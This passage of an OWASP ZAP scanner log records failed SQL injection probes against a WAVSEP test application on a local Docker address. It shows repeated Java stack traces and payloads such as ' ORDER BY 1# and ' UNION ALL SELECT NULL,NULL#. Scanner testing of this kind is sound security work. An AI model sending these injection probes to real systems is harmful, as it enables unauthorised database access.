org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681494 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681495 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681495 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681496 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 5856#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' ORDER BY 5856# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681497 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681498 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681499 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681499 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681500 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681501 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681501 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681503 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 